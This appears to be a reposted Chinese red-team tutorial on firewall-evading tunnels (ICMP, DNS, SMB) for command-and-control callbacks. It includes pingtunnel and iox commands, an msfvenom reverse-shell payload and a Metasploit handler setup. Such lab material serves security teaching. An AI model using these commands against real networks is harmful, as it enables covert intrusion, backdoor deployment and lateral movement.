自学内容网 自学内容网

内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案

知识点:

1、隧道技术篇-网络层-ICMP协议-判断&封装&建立&穿透
2、隧道技术篇-传输层-DNS协议-判断&封装&建立&穿透
3、隧道技术篇-表示层-SMB协议-判断&封装&建立&穿透

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0、不是有互联网才叫出网

1、C2常见上线采用的协议

在这里插入图片描述

2、常见的协议层出网判断

协议 判断命令
ICMP ping ip or domain
HTTP curl ip or domain
SSH ssh ip or domain
DNS nslookup domain
TCP telnet ip port
...    ................

3、常用的隧道技术

利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络(C2上线、信息收集)
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

一、演示案例-隧道技术-ICMP-探针&搭建-C2上线&穿透

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
C2上线-开防火墙入站只80&出站只放ICMP:
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。

应用场景:80为入口权限点,ICMP为上线突破口
适用场景:目标入站正向被拦截,出站有ICMP出网
排查出网协议:curl nslookup ping等命令

CS上线

ICMP隧道工具(把tcp/udp流量封装成icmp协议)-pingtunnel

https://github.com/esrrhs/pingtunnel

在这里插入图片描述
在这里插入图片描述

服务端
./pingtunnel -type server  

在这里插入图片描述

客户端
pingtunnel -type client -l :6666 -s 192.168.139.141 -t 192.168.139.141:7777 -tcp 1 -noprint 1 -nolog 1 

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CS监听器配置

127.0.0.1 6666(后门生成)
为什么生成http后门,因为http协议其实是属于tcp协议。
在这里插入图片描述
在这里插入图片描述
192.168.139.141 7777(监听上线)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

MSF上线

ICMP隧道工具(把tcp/udp流量封装成icmp协议)-pingtunnel

服务端
./pingtunnel -type server  
客户端
pingtunnel -type client -l :3333 -s 192.168.139.141 -t 192.168.139.141:3344 -tcp 1 -noprint 1 -nolog 1 

生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

MSF监听器配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3344
run

在这里插入图片描述

二、演示案例-隧道技术-DNS-探针&搭建-C2上线&穿透

在这里插入图片描述
C2上线-开防火墙入站只80&出站只放DNS:
应用场景:80为入口权限点,DNS为上线突破口
适用场景:目标入站正向被拦截,出站有DNS出网
排查出网协议:curl nslookup ping等命令

在这里插入图片描述

CS上线

域名申请及配置(域名绑定一个外网VPS)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

监听器创建及配置

在这里插入图片描述

后门绑定监听器生成

在这里插入图片描述
在这里插入图片描述

checkin
mode dns-txt

在这里插入图片描述
在这里插入图片描述

MSF上线

MSF的DNS模块已删除

三、演示案例-C2上线-SMB-开防火墙入站只445

在这里插入图片描述
SMB一般在防火墙入站默认是开启的,判断目标端口是否开放
适用场景:防火墙放行的WEB入口打不下来利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

四、演示案例-后续穿透问题

ICMP穿透-Pingtunel配合iox代理Socks内网穿透

在这里插入图片描述

在这里插入图片描述
https://github.com/EddieIvan01/iox
在这里插入图片描述

C2服务器

接收客户端传递的ICMP

./pingtunnel -type server -noprint 1 -nolog 1 -key 000000

在这里插入图片描述
将本地4455转至5566端口

./iox.exe proxy -l 4455 -l 5566

在这里插入图片描述

Web

将本地2222的TCP封装IMCP给192.168.139.141:4455

pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000

在这里插入图片描述
建立SockS节点绑定2222端口:

iox.exe proxy -r 127.0.0.1:2222

在这里插入图片描述
之后C2服务器会行成一个socks5代理
在这里插入图片描述

本地

在这里插入图片描述
在这里插入图片描述


原文地址:https://blog.csdn.net/m0_60571842/article/details/140497324

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!